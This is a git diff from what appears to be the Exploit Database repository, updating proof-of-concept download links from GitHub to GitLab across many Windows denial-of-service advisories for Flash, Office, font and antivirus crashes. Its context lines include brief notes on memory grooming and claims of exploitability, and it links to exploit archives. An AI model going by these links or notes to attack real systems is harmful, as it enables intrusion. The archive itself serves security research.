-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37346.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37346.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37347.txt b/exploits/windows/dos/37347.txt index 07e55e00b..f2472aafb 100644 --- a/exploits/windows/dos/37347.txt +++ b/exploits/windows/dos/37347.txt @@ -68,7 +68,7 @@ tricking a user into opening or previewing a malicious file. =========== http://protekresearchlab.com/exploits/PRL-2015-07.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37347.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37347.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37348.txt b/exploits/windows/dos/37348.txt index 4f583caed..a502beb49 100644 --- a/exploits/windows/dos/37348.txt +++ b/exploits/windows/dos/37348.txt @@ -66,6 +66,6 @@ tricking a user into opening or previewing a malicious file. =========== http://protekresearchlab.com/exploits/PRL-2015-08.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37348.png +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37348.png ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/37843.txt b/exploits/windows/dos/37843.txt index a167da170..110e60d53 100644 --- a/exploits/windows/dos/37843.txt +++ b/exploits/windows/dos/37843.txt @@ -51,4 +51,4 @@ So the idea is to use the rest argument to get a working poc. For example: Compile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37843.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37843.zip \ No newline at end of file diff --git a/exploits/windows/dos/37844.txt b/exploits/windows/dos/37844.txt index b91653b88..c1e77fd03 100644 --- a/exploits/windows/dos/37844.txt +++ b/exploits/windows/dos/37844.txt @@ -109,4 +109,4 @@ My mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37844.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37844.zip \ No newline at end of file diff --git a/exploits/windows/dos/37845.txt b/exploits/windows/dos/37845.txt index 0148b2e3d..30f7647be 100644 --- a/exploits/windows/dos/37845.txt +++ b/exploits/windows/dos/37845.txt @@ -42,4 +42,4 @@ At first sight this looks to be an uninitialized stack variable but I might be w --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37845.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37845.zip \ No newline at end of file diff --git a/exploits/windows/dos/37846.txt b/exploits/windows/dos/37846.txt index ca1a8d24b..2e48ab7f2 100644 --- a/exploits/windows/dos/37846.txt +++ b/exploits/windows/dos/37846.txt @@ -60,4 +60,4 @@ Reading this data back is not straightforward. For a DefineBitsLossless tag, we --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37846.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37846.zip \ No newline at end of file diff --git a/exploits/windows/dos/37847.txt b/exploits/windows/dos/37847.txt index 1d7ac11f0..aff001aa4 100644 --- a/exploits/windows/dos/37847.txt +++ b/exploits/windows/dos/37847.txt @@ -144,4 +144,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37847.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37847.zip \ No newline at end of file diff --git a/exploits/windows/dos/37848.txt b/exploits/windows/dos/37848.txt index 45740c543..198197624 100644 --- a/exploits/windows/dos/37848.txt +++ b/exploits/windows/dos/37848.txt @@ -139,4 +139,4 @@ tfield.filters = o --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37848.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37848.zip \ No newline at end of file diff --git a/exploits/windows/dos/37849.txt b/exploits/windows/dos/37849.txt index bff667852..abfb10f57 100644 --- a/exploits/windows/dos/37849.txt +++ b/exploits/windows/dos/37849.txt @@ -5,4 +5,4 @@ Credit is to KEEN Team. 3 different PoC's in the attached zip. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37849.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37849.zip \ No newline at end of file diff --git a/exploits/windows/dos/37853.txt b/exploits/windows/dos/37853.txt index 890b2ab51..c317bd2dc 100644 --- a/exploits/windows/dos/37853.txt +++ b/exploits/windows/dos/37853.txt @@ -141,4 +141,4 @@ bd.getPixel32(o,4) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37853.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37853.zip \ No newline at end of file diff --git a/exploits/windows/dos/37854.txt b/exploits/windows/dos/37854.txt index e73d45ce3..ccccd209f 100644 --- a/exploits/windows/dos/37854.txt +++ b/exploits/windows/dos/37854.txt @@ -58,4 +58,4 @@ newmc.scrollRect = o --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37854.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip \ No newline at end of file diff --git a/exploits/windows/dos/37856.txt b/exploits/windows/dos/37856.txt index fb1ca5b4a..8447fb8a6 100644 --- a/exploits/windows/dos/37856.txt +++ b/exploits/windows/dos/37856.txt @@ -47,4 +47,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37856.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37856.zip \ No newline at end of file diff --git a/exploits/windows/dos/37857.txt b/exploits/windows/dos/37857.txt index 17cf4a14d..3b7d7aca9 100644 --- a/exploits/windows/dos/37857.txt +++ b/exploits/windows/dos/37857.txt @@ -45,4 +45,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37857.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37857.zip \ No newline at end of file diff --git a/exploits/windows/dos/37858.txt b/exploits/windows/dos/37858.txt index 4f7133cc6..cb9683b67 100644 --- a/exploits/windows/dos/37858.txt +++ b/exploits/windows/dos/37858.txt @@ -58,4 +58,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37858.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37858.zip \ No newline at end of file diff --git a/exploits/windows/dos/37860.txt b/exploits/windows/dos/37860.txt index 894e01a0d..3442509bb 100644 --- a/exploits/windows/dos/37860.txt +++ b/exploits/windows/dos/37860.txt @@ -47,4 +47,4 @@ c.setRGB(o) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37860.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip \ No newline at end of file diff --git a/exploits/windows/dos/37861.txt b/exploits/windows/dos/37861.txt index 49e5739e0..37bc06d3a 100644 --- a/exploits/windows/dos/37861.txt +++ b/exploits/windows/dos/37861.txt @@ -70,4 +70,4 @@ And we're done :) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37861.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37861.zip \ No newline at end of file diff --git a/exploits/windows/dos/37862.txt b/exploits/windows/dos/37862.txt index af27583d7..f26bacc21 100644 --- a/exploits/windows/dos/37862.txt +++ b/exploits/windows/dos/37862.txt @@ -59,4 +59,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37862.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37862.zip \ No newline at end of file diff --git a/exploits/windows/dos/37875.txt b/exploits/windows/dos/37875.txt index 6e73b1add..41eef707f 100644 --- a/exploits/windows/dos/37875.txt +++ b/exploits/windows/dos/37875.txt @@ -22,4 +22,4 @@ Flash32_17_0_0_188+0x18cb: - The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37875.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip \ No newline at end of file diff --git a/exploits/windows/dos/37883.txt b/exploits/windows/dos/37883.txt index 9df13b11a..cb054b567 100644 --- a/exploits/windows/dos/37883.txt +++ b/exploits/windows/dos/37883.txt @@ -127,4 +127,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37883.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip \ No newline at end of file diff --git a/exploits/windows/dos/37884.txt b/exploits/windows/dos/37884.txt index 58e38a4e0..c52094996 100644 --- a/exploits/windows/dos/37884.txt +++ b/exploits/windows/dos/37884.txt @@ -111,4 +111,4 @@ tfield.filters = o; Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37884.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip \ No newline at end of file diff --git a/exploits/windows/dos/37909.txt b/exploits/windows/dos/37909.txt index 4b9a75267..b4405e1b5 100644 --- a/exploits/windows/dos/37909.txt +++ b/exploits/windows/dos/37909.txt @@ -92,4 +92,4 @@ Examining memory at [ebp-8] we see: An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37909.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37909.zip \ No newline at end of file diff --git a/exploits/windows/dos/37910.txt b/exploits/windows/dos/37910.txt index 1f204f70e..973d53618 100644 --- a/exploits/windows/dos/37910.txt +++ b/exploits/windows/dos/37910.txt @@ -84,4 +84,4 @@ wwlib!FMain+0x66d93: At attacker may control these values by grooming memory so that he or she controls the memory after the a8 sized chunk. This can lead to memory corruption and arbitrary code execution. The root cause of this bug suggestive of a type confusion vulnerability earlier in the call stack but this has not been determined with certainty. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37910.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37910.zip \ No newline at end of file diff --git a/exploits/windows/dos/37911.txt b/exploits/windows/dos/37911.txt index c49ca54cd..d3b0486ff 100644 --- a/exploits/windows/dos/37911.txt +++ b/exploits/windows/dos/37911.txt @@ -65,4 +65,4 @@ bp 3bdb946d ".if (@esi & 0x`ffffffff) = 0x`80008100 {} .else{gc}" This crash is writing to a memory address out-of-bound to the allocated buffer, therefore this is an exploitable vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37911.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37911.zip \ No newline at end of file diff --git a/exploits/windows/dos/37912.txt b/exploits/windows/dos/37912.txt index 8a38d0997..6303e7970 100644 --- a/exploits/windows/dos/37912.txt +++ b/exploits/windows/dos/37912.txt @@ -67,4 +67,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. To exploit this bug an attacker must spray memory until virtual address 0x00019000 is reserved and committed into the running process. Then, at offset 0x910 in that page the attacker must place any address he or she wishes to free. This will lead to an exploitable arbitrary free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37912.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37912.zip \ No newline at end of file diff --git a/exploits/windows/dos/37913.txt b/exploits/windows/dos/37913.txt index 2c06b59be..f76e9b50b 100644 --- a/exploits/windows/dos/37913.txt +++ b/exploits/windows/dos/37913.txt @@ -63,4 +63,4 @@ In this crash the value being dereferenced in edi is free-ed memory: There is a 1-bit clear at the location specified by edi shortly after the faulting eip location as well making this an exploitable condition. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37913.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37913.zip \ No newline at end of file diff --git a/exploits/windows/dos/37914.txt b/exploits/windows/dos/37914.txt index fce25ce58..c7c7b4d6a 100644 --- a/exploits/windows/dos/37914.txt +++ b/exploits/windows/dos/37914.txt @@ -73,4 +73,4 @@ In order to reproduce the problem with the provided sample, it might be necessar Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37914.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37914.zip \ No newline at end of file diff --git a/exploits/windows/dos/37915.txt b/exploits/windows/dos/37915.txt index 795895157..1ca7bf703 100644 --- a/exploits/windows/dos/37915.txt +++ b/exploits/windows/dos/37915.txt @@ -66,4 +66,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37915.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37915.zip \ No newline at end of file diff --git a/exploits/windows/dos/37916.txt b/exploits/windows/dos/37916.txt index 192003706..2a1e0cf74 100644 --- a/exploits/windows/dos/37916.txt +++ b/exploits/windows/dos/37916.txt @@ -65,4 +65,4 @@ The issue reproduces on reliably Windows 7 and 8.1. It is easiest to reproduce a Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37916.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37916.zip \ No newline at end of file diff --git a/exploits/windows/dos/37917.txt b/exploits/windows/dos/37917.txt index 97ff165e5..e6ebb3636 100644 --- a/exploits/windows/dos/37917.txt +++ b/exploits/windows/dos/37917.txt @@ -65,4 +65,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with three proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37917.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37917.zip \ No newline at end of file diff --git a/exploits/windows/dos/37918.txt b/exploits/windows/dos/37918.txt index d9e757aa3..683811741 100644 --- a/exploits/windows/dos/37918.txt +++ b/exploits/windows/dos/37918.txt @@ -130,4 +130,4 @@ I am attaching another archive with further 3 samples triggering crashes at inva Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37918.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37918.zip \ No newline at end of file diff --git a/exploits/windows/dos/37919.txt b/exploits/windows/dos/37919.txt index 3fd3f191d..d98044123 100644 --- a/exploits/windows/dos/37919.txt +++ b/exploits/windows/dos/37919.txt @@ -87,4 +87,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37919.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37919.zip \ No newline at end of file diff --git a/exploits/windows/dos/37920.txt b/exploits/windows/dos/37920.txt index 581a3b9c0..5b8f8b3d4 100644 --- a/exploits/windows/dos/37920.txt +++ b/exploits/windows/dos/37920.txt @@ -108,4 +108,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37920.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37920.zip \ No newline at end of file diff --git a/exploits/windows/dos/37921.txt b/exploits/windows/dos/37921.txt index 0d5ea11c0..0bc19ff2d 100644 --- a/exploits/windows/dos/37921.txt +++ b/exploits/windows/dos/37921.txt @@ -116,4 +116,4 @@ Note that this crash is very similar in its nature to Issue 383 (invalid memor Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37921.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37921.zip \ No newline at end of file diff --git a/exploits/windows/dos/37922.txt b/exploits/windows/dos/37922.txt index d02b1bb46..0aaac632b 100644 --- a/exploits/windows/dos/37922.txt +++ b/exploits/windows/dos/37922.txt @@ -160,4 +160,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37922.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37922.zip \ No newline at end of file diff --git a/exploits/windows/dos/37923.txt b/exploits/windows/dos/37923.txt index b5f3c2b34..e4f8c6226 100644 --- a/exploits/windows/dos/37923.txt +++ b/exploits/windows/dos/37923.txt @@ -87,4 +87,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37923.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37923.zip \ No newline at end of file diff --git a/exploits/windows/dos/37924.txt b/exploits/windows/dos/37924.txt index bf7990f7b..50f326aa5 100644 --- a/exploits/windows/dos/37924.txt +++ b/exploits/windows/dos/37924.txt @@ -54,4 +54,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37924.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37924.zip \ No newline at end of file diff --git a/exploits/windows/dos/37966.txt b/exploits/windows/dos/37966.txt index 038603007..acba76b1d 100644 --- a/exploits/windows/dos/37966.txt +++ b/exploits/windows/dos/37966.txt @@ -64,4 +64,4 @@ the crashing register value (0xAAAAAAAA) is also attached (037542f7_full.doc) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37966.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37966.zip \ No newline at end of file diff --git a/exploits/windows/dos/37967.txt b/exploits/windows/dos/37967.txt index 887c1772c..71bd3ee76 100644 --- a/exploits/windows/dos/37967.txt +++ b/exploits/windows/dos/37967.txt @@ -61,4 +61,4 @@ file). 86ea4a3c_orig.doc (original file) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37967.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37967.zip \ No newline at end of file diff --git a/exploits/windows/dos/38214.txt b/exploits/windows/dos/38214.txt index 69db3eabb..6612b644e 100644 --- a/exploits/windows/dos/38214.txt +++ b/exploits/windows/dos/38214.txt @@ -52,4 +52,4 @@ In this crash esi is a heap address. We can see that this is a free chunk: This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38214.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38214.zip \ No newline at end of file diff --git a/exploits/windows/dos/38215.txt b/exploits/windows/dos/38215.txt index 5ef94593f..77d1a4ff4 100644 --- a/exploits/windows/dos/38215.txt +++ b/exploits/windows/dos/38215.txt @@ -72,4 +72,4 @@ We can see that esi is holding a pointer to invalid memory. This is a heap addre Esi is a free-ed allocation. This is a use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38215.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip \ No newline at end of file diff --git a/exploits/windows/dos/38216.txt b/exploits/windows/dos/38216.txt index 8eb37de42..f8c660c55 100644 --- a/exploits/windows/dos/38216.txt +++ b/exploits/windows/dos/38216.txt @@ -76,4 +76,4 @@ We can see here that eax is being indexed at an offset of 0x3f0. However, if we This poc behaves like a type confusion or memory corruption issue in areas not protected by application verifier. The fact the eip was corrupted indicates a high likelihood for exploitation. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38216.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip \ No newline at end of file diff --git a/exploits/windows/dos/38217.txt b/exploits/windows/dos/38217.txt index 09ea145ff..5373029b6 100644 --- a/exploits/windows/dos/38217.txt +++ b/exploits/windows/dos/38217.txt @@ -76,4 +76,4 @@ With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated ear There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38217.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip \ No newline at end of file diff --git a/exploits/windows/dos/38272.txt b/exploits/windows/dos/38272.txt index a7b045860..eb0af115a 100644 --- a/exploits/windows/dos/38272.txt +++ b/exploits/windows/dos/38272.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=304 Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38272.zip \ No newline at end of file diff --git a/exploits/windows/dos/38281.txt b/exploits/windows/dos/38281.txt index 91c71b26f..3113c659e 100644 --- a/exploits/windows/dos/38281.txt +++ b/exploits/windows/dos/38281.txt @@ -67,4 +67,4 @@ That is from the input file: 0001e60: 8933 0800 2b2f 4f5a 0040 1909 6edf cf11 .3..+/OZ.@..n... Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38281.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38281.zip \ No newline at end of file diff --git a/exploits/windows/dos/38282.txt b/exploits/windows/dos/38282.txt index a30e7de85..767ab8b3c 100644 --- a/exploits/windows/dos/38282.txt +++ b/exploits/windows/dos/38282.txt @@ -69,4 +69,4 @@ do { That's a bug, because if index < SIZEOF_JMP, it will wrap and never exit. I would think it should decrement by 1 not sizeof(jmp) anyway, because jmps do not have to be aligned, but I don't know anything about ExeCryptor - maybe it makes sense. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38282.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38282.zip \ No newline at end of file diff --git a/exploits/windows/dos/38283.txt b/exploits/windows/dos/38283.txt index 5da4b47b7..a56a774a3 100644 --- a/exploits/windows/dos/38283.txt +++ b/exploits/windows/dos/38283.txt @@ -50,4 +50,4 @@ Evaluate expression: -2147483646 Which is less than 0x3f1, the size parameter. Those values are directly from the executable being scanned. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38283.zip \ No newline at end of file diff --git a/exploits/windows/dos/38284.txt b/exploits/windows/dos/38284.txt index 8dca352f6..8e8cf5e0c 100644 --- a/exploits/windows/dos/38284.txt +++ b/exploits/windows/dos/38284.txt @@ -39,4 +39,4 @@ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38284.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38284.zip \ No newline at end of file diff --git a/exploits/windows/dos/38285.txt b/exploits/windows/dos/38285.txt index ed6a47f03..e1b0cf105 100644 --- a/exploits/windows/dos/38285.txt +++ b/exploits/windows/dos/38285.txt @@ -57,4 +57,4 @@ The input pointer is corrupt because the loop overwrites the src pointer with at It seems likely /GS would have made this unexploitable. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38285.zip \ No newline at end of file diff --git a/exploits/windows/dos/38286.txt b/exploits/windows/dos/38286.txt index 83eca4dc7..cd3315e5f 100644 --- a/exploits/windows/dos/38286.txt +++ b/exploits/windows/dos/38286.txt @@ -29,4 +29,4 @@ D8 01 00 80 38 00 00 80 EE 01 00 80 78 00 00 80 The bug is that the index is not verified, resulting in an arbitrary write. This is obviously exploitable for arbitrary code execution. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38286.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38286.zip \ No newline at end of file diff --git a/exploits/windows/dos/38288.txt b/exploits/windows/dos/38288.txt index 20eb82738..b52e5e067 100644 --- a/exploits/windows/dos/38288.txt +++ b/exploits/windows/dos/38288.txt @@ -44,4 +44,4 @@ B0 4D 5B 5C A8 19 09 FE 36 1A B6 92 3A 92 96 78 Directly from the input file, so this is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38288.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38288.zip \ No newline at end of file diff --git a/exploits/windows/dos/38344.txt b/exploits/windows/dos/38344.txt index 22664f412..55e6303b1 100644 --- a/exploits/windows/dos/38344.txt +++ b/exploits/windows/dos/38344.txt @@ -36,4 +36,4 @@ Initiative. Code: https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38344.zip \ No newline at end of file 